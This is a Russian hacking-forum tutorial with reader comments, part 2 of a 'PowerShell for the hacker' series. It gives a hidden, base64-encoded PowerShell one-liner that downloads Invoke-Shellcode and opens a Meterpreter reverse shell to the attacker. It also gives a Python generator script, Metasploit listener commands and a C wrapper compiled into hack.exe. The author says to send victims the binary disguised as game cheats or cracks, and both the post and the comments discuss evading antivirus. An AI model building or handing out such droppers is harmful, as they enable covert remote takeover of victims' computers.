• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Powershell для хакера (часть II )

Часть 2
Предыдущая часть
Следующая часть
Все части

Приветствую вас колеги)

В прошлой статье мы научились использовать скрипты от PowerSploit для получение метерпретер сессии.

Но вынудить жертву открыть командную строку и вставить всю строку для PowerShell как вы поняли не очень легко,правда соц.инженерия делает чудеса,но все же попробуем упростить как можно больше этот процесс,процесс доставление до жертвы полезной нагрузки.

Этим мы сегодня и займемся.

Как по мне самый лучший способ доставлять жертве малварь в виде какого нибудь бинарника под предлогом какой то шары,толи это будет программа для взлома вк,толи читы на танки,толи кряк на антивирус - решать и фантазировать вам.

Давайте вспомним из прошлой статьи: https://codeby.net/threads/powershell-dlja-xakera-chast-i.58495/

нашу команду для PowerShell-а:
Код:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
Посмотрев на нее - мы можем заметить много спецсимволов,таких как кавычки,скобки,точка с запятой и т.д... Имхо такой вид не самый приемлемый как по мне.
По этому я накидал простенький скриптец который генерирует нам такую строку с base64 кодировкой и сразу же на вывод выведет нам команды для создание листенера в метасплоите.

Вот сюда я запостил если что:
https://codeby.net/threads/vashi-programmy-na-python.58124/#post-266525
Или могу прям сюда разшарить свой скриптец:
Python:
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-

import re
import base64
from termcolor import colored

def banner():
    print colored("""
===============================================================================

#####                          #######           #     #                  
#     #  ####  #####  #####     #     # ######    #     #   ##    ####  #    #
#       #    # #    # #    #    #     # #         #     #  #  #  #    # #   #
#       #    # #    # #    #    #     # #####     ####### #    # #      ####
#       #    # #####  #####     #     # #         #     # ###### #      #  #
#     # #    # #   #  #         #     # #         #     # #    # #    # #   #
#####   ####  #    # #         ####### #         #     # #    #  ####  #    #
                                                                           
           ____                             __  __      _        
          |  _ \ _____      _____ _ __     |  \/  | ___| |_ ___ _ __
          | |_) / _ \ \ /\ / / _ \ '__|____| |\/| |/ _ \ __/ _ \ '__|
          |  __/ (_) \ V  V /  __/ | |_____| |  | |  __/ ||  __/ |
          |_|   \___/ \_/\_/ \___|_|       |_|  |_|\___|\__\___|_|
                                                                 

Powershell_Meter script  is a PowerShell Command Generator.
Written by [Mister Bert0ni|DarkNode] <Corp Of Hack Team><Grey Team> <CodeBy Team>
[[Contacts]] ::: <https://new.vk.com/byhackers>
[[My Docs]] ::: <https://codeby.net/tags/darknode-tutorial/>
[[YouTube]]  ::: <https://www.youtube.com/c/CorpOfHack>
===============================================================================
""","cyan")
 
def powershell_encode(data):
    # blank command will store our fixed unicode variable
    blank_command = ""
    powershell_command = ""
    # Remove weird chars that could have been added by ISE
    n = re.compile(u'(\xef|\xbb|\xbf)')
    # loop through each character and insert null byte
    for char in (n.sub("", data)):
        # insert the nullbyte
        blank_command += char + "\x00"
    # assign powershell command as the new one
    powershell_command = blank_command
    # base64 encode the powershell command
    powershell_command = base64.b64encode(powershell_command)
    return powershell_command

def metasploit():
    print colored("[*]PowerShell генератор для Metasploit-Framework с ипользованиевм PowerSploit.","yellow")
    print colored("Оригинал можно взять здесь:","green")+ colored("https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1\n\n","cyan")
    ans_lhost = raw_input("Введите IP адрес атакующей машины(LHOST): ")
    ans_lport = raw_input("Введите Порт листенера атакуещей машины(LPORT): ")
 
    print colored("\n[*]Наша команда для PowerShell:","yellow")
    x = powershell_encode("IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost "+ans_lhost+" -Lport "+ans_lport+" -Force")
    print colored("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + x,"red")
    print colored("\n[*]Команды для metasploit-framework(Вы можете сохранить эту последовательность команд в файл listener.rc и запустить msfconsole -r listener.rc или же прямо из запущеной консоли метаслоита: resourse listener.rc","yellow")
    print colored("use multi/handler \nset payload windows/meterpreter/reverse_https \nset LHOST " + ans_lhost + "\nset LPORT " + ans_lport + "\nset ExitOnSession false \nexploit -j","green")

banner()
metasploit()


Этот скрипт нас сгенерирует нужную строку.

1.PNG


2.PNG


3.PNG


4.PNG


Затем нам нужно впихнуть ее в бинарних. И хотелось бы конечно что бы он не детектился антивирусами) По дефолту он у меня показал .

Весьма не плохо как по мне) Ну а у кого параноя насчет фулл андетекта,то скажу что вероятность использования двух малоизвестных антивирусов, которые обнаружили малварь, не очень велика

Давайте соберем бинарник. Делается это очень просто:
Просто создадим соурс код на СИ (с) со следующим содержимым:
C:
#include <stdlib.h>

int main() {
    system("Наша_Команда_PowerShell_Тута...");
        return 0;
}
5.PNG

Соответственно где "Наша_Команда_PowerShell_Тута..." - копипастим нашу строку которую вернул нам наш скрипт.

7.PNG


Компилируем в exe файл командой:
Код:
i686-w64-mingw32-gcc -o hack.exe ~/test.c
8.PNG


Тестируем:

9.PNG
10.PNG


WindowsDefender не ругается, сессия прилетает. Давайте прогоним на детект антивирусами:

6.PNG


Вроде неплохо)

Всем спасибо) Продолжения следует)

Вот демо-видео :
Предыдущая часть
Следующая часть
Все части
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
вот досада =) На XP проверил - не пошло =( ХР на виртуалке, без АНТИвирусов и пр =)
 
W

Web_start

Ну PowerShell идет по дефолту на системах от Windows 7 и выше)
[doublepost=1483801210,1483801062][/doublepost]
Приветствую вас колеги)
В прошлой статье мы научились использовать скрипты от PowerSploit для получение метерпретер сессии.
Но вынудить жертву открыть командную строку и вставить всю строку для PowerShell как вы поняли не очень легко,правда соц.инженерия делает чудеса,но все же попробуем упростить как можно больше этот процесс,процесс доставление до жертвы полезной нагрузки.
Этим мы сегодня и займемся.
Как по мне самый лучший способ доставлять жертве малварь в виде какого нибудь бинарника под предлогом какой то шары,толи это будет программа для взлома вк,толи читы на танки,толи кряк на антивирус - решать и фантазировать вам.
Давайте вспомним из прошлой статьи:
https://codeby.net/threads/powershell-dlja-xakera-chast-i.58495/
нашу команду для PowerShell-а:
***Скрытый текст***
Посмотрев на нее - мы можем заметить много спецсимволов,таких как кавычки,скобки,точка с запятой и т.д... Имхо такой вид не самый приемлемый как по мне.
По этому я накидал простенький скриптец который генерирует нам такую строку с base64 кодировкой и сразу же на вывод выведет нам команды для создание листенера в метасплоите.
Вот сюда я запостил если что:
***Скрытый текст***
Или могу прям сюда разшарить свой скриптец:
***Скрытый текст***

Этот скрипт нас сгенерирует нужную строку.
Посмотреть вложение 7952 Посмотреть вложение 7953 Посмотреть вложение 7954 Посмотреть вложение 7955
Затем нам нужно впихнуть ее в бинарних. И хотелось бы конечно что бы он не детектился антивирусами) По дефолту он у меня показал .
Весьма не плохо как по мне) Ну а у кого параноя насчет фулл андетекта,то скажу что вероятность использования двух малоизвестных антивирусов, которые обнаружили малварь, не очень велика
Давайте соберем бинарник. Делается это очень просто:
Просто создадим соурс код на СИ (с) со следующим содержимым:

C:
#include <stdlib.h>

int main() {
    system("Наша_Команда_PowerShell_Тута...");
        return 0;
}
Посмотреть вложение 7956
Соответственно где "Наша_Команда_PowerShell_Тута..." - копипастим нашу строку которую вернул нам наш скрипт.
Посмотреть вложение 7957
Компилируем в exe файл командой:

Код:
i686-w64-mingw32-gcc -o hack.exe ~/test.c
Посмотреть вложение 7958

Тестируем:
Посмотреть вложение 7959 Посмотреть вложение 7960

WindowsDefender не ругается, сессия прилетает. Давайте прогоним на детект антивирусами:
Посмотреть вложение 7961

Вроде неплохо)

Всем спасибо) Продолжения следует)

Вот демо-видео :
***Скрытый текст***
Интересные темы вы выкладываете, ещё было бы интересно почитать об интеграции Metasploit Framework в систему. К примеру уведомления об открытии сеанса Meterperter

5. Условия и правила создания тем и сообщений, размещение других информационных материалов (фото, видео)
***
7. Избыточное цитирование запрещено. Оставляйте только строки с теми словами или вопросами, на которые Вы собираетесь ответить.
 
Последнее редактирование модератором:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
[doublepost=1483801210,1483801062][/doublepost]
Интересные темы вы выкладваете, ещё было бы интересно почитать о интеграции Metasploit Framework в систему. К примеру уведомления о открытии сеанса Meterperter
Не совсем понял вопрос|просьбу.
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Ну знаете ли когда к примеру запустил exploit -j и пошел делать свои дела, не будешь же постоянно следить за терминалом. А хочется что бы через notify-send все высветилось
Есть голосовые оповещения в метасплоите . Notify-send вам не поможет если вы отойдете делать дела)
По возможности раскрою это в последующих постах
 
W

Web_start

Огромное спасибо, даже не подозревал о подобном. Жду ваших новых постов, форум просто отличный!;)
 
  • Нравится
Реакции: BaJIepraH и <~DarkNode~>

aserf

Green Team
29.12.2016
10
1
BIT
0
Сразу извиняюсь, за глупый вопрос!
Скрипт power_meter я сохранил через idle phyton 2.7 в файл, но через терминал пишет что отказано в доступе, как открыть скрипт не подскажите пожалуйста?
 
G

Gleb316

Можно сделать всё тоже самое но запихнуть не в exe а в pdf файл. ?
 

ShurikEEN

New member
11.11.2016
2
0
BIT
0
Автор, прям респект. А не подскажешь как при компиляции запихнуть иконку и если можно паралельно еще выполнить какую либо команду. В программировании не бум-бум =). Заранее спасибо.
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
Извиняюсь за глупый вопрос - как запустить ваш скрипт для генерации строки ? Скопировать код,закинуть в среду разработки питон,подправить хост,порт и выполнить ?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
текст скрипта под споллером..далее вы из его делаете питоновский файл.если вы его не видите значит вам нужно набрать определенное число симпатий, или сообщений.Активно участвуйте в жизни форума и будет вам счастье.
 
  • Нравится
Реакции: <~DarkNode~>
T

tumm

Скомпилил код(для теста перед кодом пш),палится неслабо,хоть и гавноав


Сам код
Код:
#include <stdlib.h>

int main() {
    system("powershell regedit");
        return 0;
}

Как убать лишнее палево?

Вместе с кодом пш результат


После обфускации аес


Везде вместо регедита код пш для мсф сессии
 
R

rkislov

Странно но каспер стал отлдавливать такие вещи
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!